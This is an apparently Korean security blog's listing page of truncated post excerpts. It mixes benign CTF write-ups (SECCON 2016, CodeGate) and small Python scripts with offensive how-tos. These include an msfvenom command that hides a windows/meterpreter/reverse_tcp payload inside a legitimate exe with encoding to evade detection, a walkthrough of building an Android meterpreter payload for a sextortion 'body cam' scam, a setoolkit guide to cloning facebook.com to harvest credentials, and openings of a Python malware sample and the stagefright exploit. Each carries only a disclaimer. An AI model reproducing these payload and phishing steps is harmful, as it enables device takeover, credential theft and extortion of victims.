전체 글284

• python 같은 파일 뽑아내기 :) 사전파일에 파일이름과 폴더를 지정해주면 중복파일을 뽑아줍니다 :) # -*- coding: utf-8 -*- import os f = open('/Users/z3alous/Desktop/flag1.txt', 'w') Language 2016. 12. 18.

• md5 한번에 인코딩하기 :) ex)폴더지정 # -*- coding: utf-8 -*-import hashlibimport os f = open('/Users/z3alous/Desktop/flag.txt', 'w') def md5(fname): hash_md5 = hashlib.md5() with open(fname, "rb") as f: for chunk in iter(lambda: f.read(4096), b""): hash_md5.update(chunk) return hash_md5.hexdigest() for root, dirs, files in os.walk('폴더 경로'): for fname in files: full_fname = os.path.join(root, fname) f.write(md5(full_fname) + '\n') f.. Language 2016. 12. 18.

• 

  nmap tutorial :) nmap은 network mapper의 줄인말로 네트워크를 검색할 때 매우 좋은 툴이지만 해커에게 강한 무기가 될수 있는 오픈 소스 이다. nmap의 공식 사이트는 www.nmap.org 이며 우분투 같은 경우엔 apt-get install nmap Security Study/Network 2016. 12. 17.

• V3SPA: An Open Source Tool for Visually Analyzing and Diffing SELinux/SE for Android Security Policies V3SPA: An Open Source Tool for Visually Analyzing and Diffing SELinux/SE for Android Security Policies SELinux and SE for Android can be a crucial part of securing a system, but the size and complexity of SELinux security policies make them challenging for security policy administrators to develop and maintain security policies. For example, the sesearch utility shows 94,420 allow rules in the 2.. Security Study/Server(Linux) 2016. 12. 17.

• youtube 구독부탁드려요 :) subscribe plz :) 보안 관련 동영상을 올릴 예정입니다. :)많은 구독 부탁드려요 !! https://www.youtube.com/channel/UCn81GCH7RfiOdaZmWfng2Ng We will post security related videos. :)Many subscriptions please !! My Story 2016. 12. 16.

• 

  RC3CTF_300_Breaking News 300 - Breaking NewsWe just received this transmission from our news correspondents. We need to find out what they are telling us.file 문제인데 문제의 파일을 받아보면 알집으로 파일을 하나 주고 그것을 풀면 이제 우리가 풀어야 하는 문제 파일들이 나온다. 먼저 헥스로 파일을 확인 해보면 별 특이한 것이 없는 것같다 하나 하나 보던 도중 마지막에 base64로 디코딩이 되어 있는 것 같은 문자열을 발견하고 하나하나 파일에서 그러한 글자만 모아보았다. 총 나온 파일은 5개 chapter 4, 9, 10, 15, 18 이렇게 나왔다. 이제 base 64 decoding 을 해보자 base 64 디코딩을 하니.. Wargame/CTF(Capture The Flag) 2016. 12. 16.

• Mobile Application Reverse Engineering: MARA Mobile Application Reverse engineering and Analysis Framework MARA is a Mobile Application Reverse engineering and Analysis Framework. It is a tool that puts together commonly used mobile application reverse engineering tools, in order to make the task or reverse engineering and analysis easier and friendly to mobile application developers and security professionals. Features supportedAPK Revers.. Security Study/Reversing 2016. 12. 16.

• 

  netool 설치방법(how to install netool) netool = script project 넷툴을 설치하기 위해 https://sourceforge.net/projects/netoolsh/ 들어가면 밑에와 같은 창이 뜬다. :) Git -> opensource-kali 를 클릭하게 되면 밑으로 쭉쭉 내리면 설치방법이 뜬당 :) 자세한건 유튜브로 Metasploit/Kali & Backtrack 2016. 12. 16.

• 

  요즘 유행 하던 몸캠 (기초방식) 요즘 몸캠이 유행을 했었다. 대충 원리를 보면 스카xx같은 곳에서 채팅을 하다가 몸캠을 하자고 파일을 받으라고 한다. (몸캠을 하기위한 전용 파일이라 뻥을 친다.) 그러고 파일을 보내는데 그 파일은 당연히 악성코드 !! :) 이제 그것을 재연해보자 그전에 모든 책임은 사용자 본인에게 있습니다.시작해보자 :X 먼저 service apache2 start로 아파치를 실행 시켜주고 service postgresql start 로 postgresql 또한 시킨다. 궁극적인 명령어 service metasploit start 로 metasploit 또한 실행시킨다. 그 후 이제 악성코드를 만들어야 하는데...명령어 msfvenom을 이용 하여 만들어 보자.msfvenom -p android/meterpreter/.. Metasploit 2016. 12. 15.

• Pharming malware 시연입니다. Pharming malware 파밍 악성코드 동영상입니다. 주의하세욤 :) Malware 2016. 12. 15.

• SQL injections vulnerabilities in Stack Overflow PHP questions SQL injections vulnerabilities in Stack Overflow PHP questions lastest SQL Injection vulnerabilities in PHP questions sql injection 취약점에 취약한 php문을 볼수 있고 보기 쉬운 인터페이스로 되어있어요 :) https://laurent22.github.io/so-injections/ Security Study/Web 2016. 12. 14.

• python 악성코드 샘플입니다. python 악성코드 샘플입니다. 분석 또는 연구 목적으로만 사용하시기 바랍니다. 모든 책임은 사용자 본인에게 있습니다. import subprocessimport sysimport osimport base64import binasciiimport threadingimport timeimport randomimport stringimport imaplibimport emailimport uuidimport platformimport ctypesimport json#import logging #from traceback import print_exc, format_excfrom base64 import b64decodefrom smtplib import SMTPfrom email.MIMEMultipart .. Malware 2016. 12. 14.

• 

  seccon2016 - Memory Analysis_100 Memory Analysis100 pointsMemory Analysis Find the website that the fake svchost is accessing. You can get the flag if you access the website!!memoryanalysis.zip The challenge files are huge, please download it first. Hint1: http://www.volatilityfoundation.org/ Hint2: Check the hosts filepassword: fjliejflsjiejlsiejee33cnc 이것이 문제인데 ... 파일을 받으면 이미지 파일 하나를 받을 수 있다.힌트 1번을 보면 볼라틸리티를 이용하여 푸는 것같다. 먼저 이.. Wargame/CTF(Capture The Flag) 2016. 12. 13.

• rsa.py_ctf #값넣으면 ''없애기...p = ''g =''a = ''b = '' C = ''CA = pow(C,a,p)CAB = pow(CA,b,p) print("key_is",CAB) Language 2016. 12. 12.

• 

  seccon2016 - voip_100 VoIP100 pointsVoIP Extract a voice. The flag format is SECCON{[A-Z0-9]}. 문제 데스네... 파일을 받으면 pcap파일을 받을 수 있다. 파일을 열어보면 와이어 샤크로 열리는데... RTP을 디코드 할 것이다.그럼 RTP란 뭘까?RTP란 실시간 멀티미디어 데이터의 전송을 지원하는 Real Time Protocol다. Analyze라는 메뉴에 들어가면 Decode As는 메뉴를 찾으 수있다. 메뉴를 클릭하면 위와 같은 창이 뜨는데 +라는 표시를 눌러 RTP를 등록 해주면 된다. 그 후 Telephony메뉴에서 RTP에서 Stream Analysis를 클릭하게 되면 이렇게 streaming 되는 것을 볼수있다. 저기서 플레이 streams를 클릭하면 소.. Wargame/CTF(Capture The Flag) 2016. 12. 12.

• SECCON2016 - Vigenere_100 SECCON 2016 Vigenerek: ???????????? p: SECCON{???????????????????????????????????} c: LMIG}RPEDOEEWKJIQIWKJWMNDTSR}TFVUFWYOCBAJBQ k=key, p=plain, c=cipher, md5(p)=f528a6ab914c1ecf856a1d93103948fe 문제이다. Vigenere 암호를 이용하여 풀어야 할거 같다. SECCON{ = VIGENER E p: SECCON{ }c: LMIG}RPEDOEEWKJIQIWKJWMNDTSR}TFVUFWYOCBAJBQ |A B C D E F G H I J K L M N O P Q R S T U V W X Y Z { }--------------------------------.. Wargame/CTF(Capture The Flag) 2016. 12. 12.

• roo-me)Command & Control - level 2 -15Poin 파일을 다운 받게 되면 또잉 ch2.dmp라는 덤프파일을 얻을 수 있다.!!! 문제를 해석해보자! 정답은 워크스테이션 호스트네임(즉, 컴퓨터이름)이 정답이란다.! :) 룰루~ 그럼 해보자 필자는 strings 라는 명령어를 사용하여 풀어볼 것이다. strings ch2.dmp | grep COMPUTERNAME Wargame/CTF(Capture The Flag) 2016. 12. 12.

• 

  Hack The Vote forensic 150 - Warpspeed 문제를 다운받아 보면 이러한 사진을 받을 수 있다. 글씨가 찌그러져서 보기 힘들다... 어떻게 풀까 생각을 하면서 노가다로 하나하나 잘라서 풀어볼까 생각을 해봤지만 010editor 라는 프로그램을 이용하여 풀어보기로 했다. 이렇게 파일을 볼수가 있다. JPG.bt를 확인하여 WORD Y, WORD X의 값을 500, 500 으로 변경할것이다. 변경하여 저장을 하게 되면 이렇게 글자를 확인 할 수 있다.!!! 끄읏!!! Wargame/CTF(Capture The Flag) 2016. 11. 24.

• string filter(php) php://filter/string.rot13/resource=example.com http://php.net/manual/en/filters.string.php Security Study/Web 2016. 10. 5.

• 

  CodeGate 2013 f300 Code Gate 2013 문제를 먼저 보면 파일을 다운 받아보면 docx파일 하나다 ... 생각해보자 ?..... 이러한 문제는 ooXML(office open XML)문제일 가능성이 크다. 오피스 오픈 XML(Office Open XML, OOXML, 오픈XML)은 마이크로소프트가 추진하였으며 2006년과 2008년 두차례에 걸쳐 Ecma 인터내셔널에 유럽 표준(ECMA-376)으로, 2008년에 ISO/IEC에 국제 표준(ISO/IEC 29500)으로 승인되었다. 이 문서 규격은 문서, 프레젠테이션, 스프레드시트를 포함한다. 확장자는 .docx 또는 .docx(문서), .pptx(프레젠테이션), .xlsx(스프레드시트)로 통일되어 있다. -wiki- 먼저 docx파일을 zip으로 확장자 변경 후 확.. Wargame/CTF(Capture The Flag) 2016. 9. 23.

• 파일합치기 (악성코드있는 파일만들기) 모든 사용의 법적 책임은 사용자 본인에게 있습니다. msfvenom -a 아키텍쳐 --platform 플랫폼 -x file.exe -k -p PAYLOAD lhost=ip lport=PORT -e x86/shikata_ga_nai -i 3 -b "\x00" -f exe -o outputfilename.exe ex) msfvenom -a x86 --platform windows -x file.exe -k -p windows/meterpreter/reverse_tcp lhost=ip lport=4444 -e x86/shikata_ga_nai -i 3 -b "\x00" -f exe -o outputfilename.exe 핸들러에서 프로세스 옮기는 명령어 migrate 프로세스 넘버 ex) migrate 1111 Metasploit 2016. 5. 24.

• apmsetup에서 forbidden문제 해결 apm폴더를 들어가서 (ex)C:\APM_Setup\Server\Apache\conf) < -이렇게 들어가서 httpd.conf파일을 메모장으로 열어 아래와같이 수정해준다. # # Possible values for the Options directive are "None", "All", # or any combination of: # Indexes Includes FollowSymLinks SymLinksifOwnerMatch ExecCGI MultiViews # # Note that "MultiViews" must be named *explicitly* --- "Options All" # doesn't give it to you. # # The Options directive is both compl.. Security Study/Server(Linux) 2016. 3. 2.

• 

  가짜 facebook만들기 모든 법적 책임은 사용자에게 있습니다.연구용으로만 사용하세요. 먼저 Kali linux or parrot linux에서 터미널을 open setoolkit을 입력한다. 입력을 하면 이러한 창을 확인 하실수 있습니다. 여기서 Social-Engineering Attacks를 해야하기 위해 1번을 입력합니다. 다음은 Website Attack Vectors을 위해 2번 여기에선 Credential Harvester Attack Method를 위해 3번 facebook을 만들기 위해 2번을 클릭합니다. 여기까지 하셨으면 반왔습니다. 2번을 하셨으면 IP를 입력하시면 되는데요! ip를 입력하면 이제 clone하기 위한 사이트를 입력하시면 됩니다. 저는 facebook.com을 하기위해 http://faceboo.. Metasploit 2016. 2. 11.

• 다시 블로그 활성화합니다. 대략 2개월동안 블로그를 신경쓰지 못한 것 같습니다. 다시 블로그를 활성화합니다. 다들 새해복 많이 받으시고 원하시는 바 모두 이루어 지길 바랍니다. My Story 2016. 2. 10.

• stagefright.py 모든 법적책임은 사용자에게 있습니다.연구용으로만 사용하시기 바랍니다. #coding: utf-8#!/usr/bin/env python# Fixed By Rizaldi# Joshua J. Drake (@jduck) of ZIMPERIUM zLabs# Shout outs to our friends at Optiv (formerly Accuvant Labs)# (C) Joshua J. Drake, ZIMPERIUM Inc, Mobile Threat Protection, 2015# www.zimperium.com## Exploit for RCE Vulnerability CVE-2015-1538 #1# Integer Overflow in the libstagefright MP4 'stsc' atom handlin.. Metasploit 2016. 2. 10.